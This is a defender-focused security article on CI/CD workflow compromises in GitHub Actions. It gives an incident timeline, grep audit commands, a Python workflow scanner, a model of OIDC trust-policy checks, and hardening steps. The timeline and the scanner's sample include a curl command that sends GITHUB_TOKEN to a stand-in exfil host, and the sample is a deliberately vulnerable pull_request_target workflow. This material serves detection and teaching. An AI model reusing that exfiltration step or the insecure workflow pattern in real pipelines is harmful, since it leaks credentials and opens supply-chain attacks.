Cordyceps CI/CD Flaws Expose 300+ GitHub Repositories to Supply-Chain Attacks

Cordyceps CI/CD Flaws: DevSecOps Reality Check
By: Morgan K. (LinkedIn, GitHub)
Staff Security Engineer, DevSecOps Lead (12+ years)
Ex-Splunk, PagerDuty, AWS; Speaker @ DEF CON/BSides
Published: 2024-06-25
Last updated: 2024-06-25
Changelog: Expanded “What Cordyceps Is” definition, sanitized case study, added detection commands, checked CVE/advisory links.
What Is “Cordyceps” (And Why Should You Care?)
“Cordyceps” refers to a class of CI/CD workflow compromises, most commonly in GitHub Actions and similar runners, in which an attacker hijacks a privileged pipeline token, manipulates how workflows are triggered or called, or abuses an insecure third-party action to escalate privileges and ship malicious artifacts.
The technical root is the same each time: an overprivileged GITHUB_TOKEN, a cloud OIDC trust relationship that checks too little about who is presenting the token, and workflows that reference unpinned, unvetted actions (GitHub Security Advisory GHSA-cf5r-xfxx-7fcp, CISA Alert AA24-108A).
Attack vector: a pull request, typically from a fork, triggers a workflow that runs in the base repository's context (for example a pull_request_target workflow that checks out the PR head) and receives write scopes such as contents: write and id-token: write. Attacker-controlled code then runs with a token that can read secrets, mint cloud credentials, and push backdoored artifacts.
The Anatomy of a CI/CD Breakdown
Timeline: Real Incident, Real Impact
- Day 1: Standard nightly build triggers via GitHub Actions.
- 00:07 UTC: Threat actor submits a PR that references their own action (attack/k8s-backdoor@v1).
- 00:15: Maintainer merges. The action is unpinned and the workflow has no permissions block.
- 00:20: Workflow executes; GITHUB_TOKEN is granted contents: write, id-token: write, packages: write.
- 00:23: The attacker's step runs curl inside the workflow, siphoning the token to a remote server:
      - name: Exfiltrate secrets
        run: curl -d "$GITHUB_TOKEN" https://exfil.example.com
- 00:25: GitHub audit logs show a deployment to staging via the compromised action.
- Day 2: AWS alerts: 300+ new EC2 instances spun up for cryptomining.
- Day 3: Response team investigates runner logs, isolates impacted hosts, rotates secrets.
- Day 4: Incident postmortem. Total impact: $47K in cloud spend, partial credential exposure, delayed deployments.
TTPs & Indicators
- PRs referencing unpinned actions.
- Workflows missing permission scoping.
- Runners showing unexplained artifact downloads and outbound network traffic.
Why We Keep Walking Into This Trap
- Process drift: “time-to-market” wins over “least privilege.”
- Access overload: pipeline tokens and OIDC roles are granted far more than they need, often at the workflow or runner level rather than per job.
- Third-party trust: popular actions are used without vetting or pinning (uses: actions/some-action@master), so whoever controls that branch controls your build.
Vendor defaults aren't your friend. CI platforms (GitHub, GitLab, Jenkins) have historically shipped with permissive defaults (GitHub Docs: Permissions). GitHub now defaults GITHUB_TOKEN to read-only for newly created repositories and organizations, but older ones keep whatever default was in force when they were created, so check rather than assume. Either way, privilege escalation is trivial if you don't lock it down.

Impact: Who Gets Hurt (And How Bad Is It?)
- Target: Large repos with auto-deploy or package publishing, especially those running on shared runners or in monorepos.
- Severity: Credential theft, poisoned builds, cryptomining payloads, lateral movement (dev/test/prod blast radius).
- Cost: anything from cloud billing spikes ($1K–$100K+) to customer-facing outages, plus regulatory exposure if data exfiltration is involved.
Detection Checklist: Find the Weak Spots Fast
Workflow & Token Audit
- List workflows that grant write scopes (the write-all shorthand, or any scope: write, including id-token: write). This is a triage grep over every file under the workflows directory; review each hit in context:
grep -rnE 'write-all|^[[:space:]]+[a-z-]+:[[:space:]]*write([[:space:]]|$)' .github/workflows/
- Find actions that are not pinned to a full 40-character commit SHA (tags and branches such as @v3 or @master are mutable):
grep -rhoE 'uses:[[:space:]]*[^[:space:]]+' .github/workflows/ | grep -vE '@[0-9a-f]{40}$' | sort -u
- Check for hardcoded credentials in the tree (AKIA followed by 16 characters is the shape of an AWS long-term access key ID):
grep -rnE 'AWS_ACCESS_KEY|AKIA[0-9A-Z]{16}' --exclude-dir=.git .
- Audit runner logs for unusual activity: unfamiliar downloads, or outbound curl/wget commands in step output that reference secrets.
- Use the GitHub CLI to list every workflow, including disabled ones, and pick out those with deploy authority by name:
gh workflow list --all | grep -i deploy
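The checks above, folded into one Python scanner. This is an added example, not code from the article or from GitHub: a line-based audit of a workflow file (deliberately not a YAML parser, so it behaves like the grep commands but understands enough indentation to tell a permissions mapping from the rest of the file). It flags unpinned actions, a missing or over-broad permissions block, a pull_request_target trigger that checks out the PR head (the attack vector described earlier in this article), and any curl/wget step that touches GITHUB_TOKEN or secrets. The two workflow files embedded in it are constructed for the example; the attack/k8s-backdoor@v1 reference and the exfil.example.com host come from the case study above, and the all-zero SHA in the hardened file is a placeholder for a real commit.

```python
import re
from typing import List

COMMIT_SHA_RE = re.compile(r"^[0-9a-f]{40}$")        # only a full commit SHA is immutable
USES_RE = re.compile(r"^(?:-\s*)?uses:\s*['\"]?([^\s'\"#]+)")
PERMISSIONS_RE = re.compile(r"^permissions:\s*(.*)$")
WRITE_SCOPE_RE = re.compile(r"^([a-z-]+):\s*write\b")
OUTBOUND_RE = re.compile(r"\b(curl|wget)\b")
SECRET_RE = re.compile(r"GITHUB_TOKEN|secrets\.")


def audit_workflow(text: str) -> List[str]:
    """Line-based audit of one workflow file; returns one finding per weak spot."""
    findings: List[str] = []
    perm_indent = None            # indent of an open 'permissions:' mapping, else None
    saw_permissions = False
    pull_request_target = False
    checks_out_pr_head = False
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        indent = len(raw) - len(raw.lstrip(" "))
        # A permissions mapping ends when indentation returns to its own level.
        if perm_indent is not None and indent <= perm_indent:
            perm_indent = None
        if perm_indent is not None:
            m = WRITE_SCOPE_RE.match(line)
            if m:
                findings.append(f"L{n}: write scope '{m.group(1)}: write' granted to GITHUB_TOKEN")
            continue
        m = PERMISSIONS_RE.match(line)
        if m:
            saw_permissions = True
            value = m.group(1).strip()
            if value == "write-all":
                findings.append(f"L{n}: 'permissions: write-all' grants every scope")
            elif value == "":
                perm_indent = indent  # individual scopes follow on deeper-indented lines
            continue
        m = USES_RE.match(line)
        if m:
            ref = m.group(1)
            if not ref.startswith(("./", "docker://")):   # local/image refs have no SHA to pin
                sha = ref.rsplit("@", 1)[1] if "@" in ref else ""
                if not COMMIT_SHA_RE.match(sha):
                    findings.append(f"L{n}: unpinned action '{ref}' (not a 40-hex commit SHA)")
            continue
        pull_request_target |= "pull_request_target" in line
        checks_out_pr_head |= "github.event.pull_request.head" in line
        if OUTBOUND_RE.search(line) and SECRET_RE.search(line):
            findings.append(f"L{n}: secret passed to outbound curl/wget: {line}")
    if not saw_permissions:
        findings.append("no 'permissions:' block: GITHUB_TOKEN gets the repository default")
    if pull_request_target and checks_out_pr_head:
        findings.append("pull_request_target checks out the PR head: untrusted code runs "
                        "with the base repository's token (pwn request)")
    return findings


# Constructed sample: the case study's workflow as it would have looked.
VULNERABLE = """\
on:
  pull_request_target:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - uses: attack/k8s-backdoor@v1
      - name: Exfiltrate secrets
        run: curl -d "$GITHUB_TOKEN" https://exfil.example.com
"""

# Constructed sample: the same job after this article's mitigations. The all-zero
# SHA is a placeholder; pin to the action's real commit.
HARDENED = """\
on:
  schedule:
    - cron: "0 0 * * *"
permissions:
  contents: read
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0000000000000000000000000000000000000000 # v3, placeholder SHA
      - run: ./build.sh
"""

if __name__ == "__main__":
    print(*audit_workflow(VULNERABLE), sep="\n")
    print("hardened findings:", audit_workflow(HARDENED))
```

Run it against a real tree with `for f in .github/workflows/*.y*ml; do python3 audit.py "$f"; done` after swapping the constants for `open(f).read()`; the indentation tracking also catches job-level `permissions:` mappings, which the top-level grep misses.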
Indicators
- Spikes in runner network activity.
- Unauthorized artifact deployment.
- Secrets exfiltration attempts (outbound HTTP calls from workflow steps).
Mitigation Checklist: Make Your Pipeline Hostile to Attackers
Scope Workflow Permissions
At the top of your workflow, restrict the token to read-only:
permissions:
contents: read
id-token: none
Once a permissions block is present, every scope you do not list is none, so grant a single write scope (for example packages: write, or id-token: write for OIDC) at the job level and only in the job that needs it.
GitHub Docs: Workflow Permissions
Pin Actions
Reference third-party actions by full commit SHA, not by tag or branch. A tag such as v3 is mutable; the action's owner, or whoever compromises their account, can move it:
uses: actions/checkout@v3
Pin to the commit instead, keeping the version in a trailing comment so Dependabot can still propose updates:
uses: actions/checkout@8a407... # v3 (use the full 40-character commit SHA)
Enable OIDC for Cloud Auth
Use short-lived credentials, never static keys.
Sample AWS IAM trust policy (Official AWS Docs); the account ID and repository below are placeholders. The aud check alone is not sufficient: every GitHub repository mints tokens with that audience, so the sub condition is what ties the role to your repository. For production roles tighten it further to a branch or environment, e.g. repo:my-org/my-repo:ref:refs/heads/main or repo:my-org/my-repo:environment:prod.
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::123456789012:oidc-provider/token.actions.githubusercontent.com"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
        },
        "StringLike": {
          "token.actions.githubusercontent.com:sub": "repo:my-org/my-repo:*"
        }
      }
    }
  ]
}
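How the Condition block decides who may assume the role, as an added example that is not code from the article or from AWS: a small Python model of IAM's StringEquals and StringLike evaluation against the claims of a GitHub OIDC token. It shows that a policy with only the aud check accepts a token minted by any repository, while a sub condition rejects it. The claim sets, the my-org/my-repo and attacker/anything names, and the three policy variants are constructed for the example; real STS evaluation has more operators and rules than this models.

```python
import re
from typing import Dict, List, Union

ISSUER = "token.actions.githubusercontent.com"
Claims = Dict[str, str]
Condition = Dict[str, Dict[str, Union[str, List[str]]]]


def _iam_glob(pattern: str) -> "re.Pattern[str]":
    """IAM StringLike wildcards: '*' matches any run of characters, '?' exactly one."""
    regex = "".join(".*" if c == "*" else "." if c == "?" else re.escape(c) for c in pattern)
    return re.compile(f"^{regex}$")


def condition_allows(condition: Condition, claims: Claims) -> bool:
    """Model of how AssumeRoleWithWebIdentity applies a trust policy's Condition block
    to the claims in a GitHub OIDC token: every operator/key pair must match, and a
    missing claim never matches. Only StringEquals and StringLike are modelled."""
    for operator, tests in condition.items():
        for key, expected in tests.items():
            claim = key.split(":", 1)[1]  # '<issuer>:sub' -> 'sub'
            actual = claims.get(claim)
            if actual is None:
                return False
            values = expected if isinstance(expected, list) else [expected]
            if operator == "StringEquals":
                matched = actual in values
            elif operator == "StringLike":
                matched = any(_iam_glob(v).match(actual) for v in values)
            else:
                raise ValueError(f"operator {operator!r} is not modelled here")
            if not matched:
                return False
    return True


# Three Condition blocks, weakest to tightest (constructed for this example).
AUD_ONLY: Condition = {"StringEquals": {f"{ISSUER}:aud": "sts.amazonaws.com"}}
REPO_SCOPED: Condition = {
    "StringEquals": {f"{ISSUER}:aud": "sts.amazonaws.com"},
    "StringLike": {f"{ISSUER}:sub": "repo:my-org/my-repo:*"},
}
BRANCH_SCOPED: Condition = {
    "StringEquals": {
        f"{ISSUER}:aud": "sts.amazonaws.com",
        f"{ISSUER}:sub": "repo:my-org/my-repo:ref:refs/heads/main",
    }
}


def _claims(sub: str, repository: str) -> Claims:
    """Constructed subset of a GitHub OIDC token payload (real tokens carry more claims)."""
    return {"iss": f"https://{ISSUER}", "aud": "sts.amazonaws.com",
            "sub": sub, "repository": repository}


OWN_MAIN = _claims("repo:my-org/my-repo:ref:refs/heads/main", "my-org/my-repo")
OWN_PR = _claims("repo:my-org/my-repo:pull_request", "my-org/my-repo")
ATTACKER = _claims("repo:attacker/anything:ref:refs/heads/main", "attacker/anything")


def matrix() -> Dict[str, Dict[str, bool]]:
    """Which token each policy lets assume the role."""
    policies = {"aud-only": AUD_ONLY, "repo-scoped": REPO_SCOPED, "branch-scoped": BRANCH_SCOPED}
    tokens = {"own-main": OWN_MAIN, "own-pr": OWN_PR, "attacker": ATTACKER}
    return {p: {t: condition_allows(c, k) for t, k in tokens.items()} for p, c in policies.items()}


if __name__ == "__main__":
    for policy, row in matrix().items():
        print(f"{policy:14s}", {t: ("allow" if ok else "deny") for t, ok in row.items()})
```

The aud-only row is the point: it allows all three tokens, including the one from a repository you have never heard of. Note also that repo-scoped still admits the pull_request subject, which is why a production role should match a specific branch or environment.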
Ephemeral & Segregated Runners
- Use ephemeral runners: a clean VM or container per job, destroyed afterwards. GitHub-hosted runners already work this way; self-hosted runners must be registered with --ephemeral so one job cannot leave anything behind for the next.
- Segregate prod runners from dev/test.
Mandatory Reviews & Environment Protection
- Require approvals for deployment workflows.
- Enable GitHub environment protection rules.
Credential Hygiene
- Rotate all keys regularly (weekly/monthly).
- Enable secret scanning and alerting.
Tooling That Actually Helps
- Dependabot: alerts for vulnerable dependencies.
- Sigstore/cosign: verify signed artifacts.
- SLSA: supply chain security frameworks.
- Trivy, Grype: container image and dependency vulnerability scanning (Trivy also flags IaC and repository misconfigurations).
- Gitleaks: detect secret exposure.
- GitHub Advanced Security/CodeQL.
- Vendor and OSS advisory pages (GitHub Advisory Database), CISA alerts.
Detect, Contain, Remediate, Prevent
- Detect: Use automated scanning, audit logs, and network activity monitoring.
- Contain: Isolate compromised runners, rotate affected credentials immediately.
- Remediate: Fix workflow permissions, pin actions, scan for further indicators.
- Prevent: Move to ephemeral runners, OIDC flows, enforced reviews, and dependency pinning.
If you find signs of a current exploit, report via GitHub Security, CISA Reporting, or your organization's IR channel.
Resources & Where to Look Next
- GHSA-cf5r-xfxx-7fcp GitHub Advisory
- CISA Alert AA24-108A
- GitHub Actions Security Guides
- DEF CON Supply Chain Panel 2023
- SLSA Framework
- AWS OIDC Integration
Responsible Disclosure: If you discover novel exploit vectors, contact affected platform vendors or report through CISA. This article contains only defender-focused guidance.
Still think your pipeline is bulletproof? Wait until a typo in your YAML turns your build into a credential vending machine. Don’t say you weren’t warned.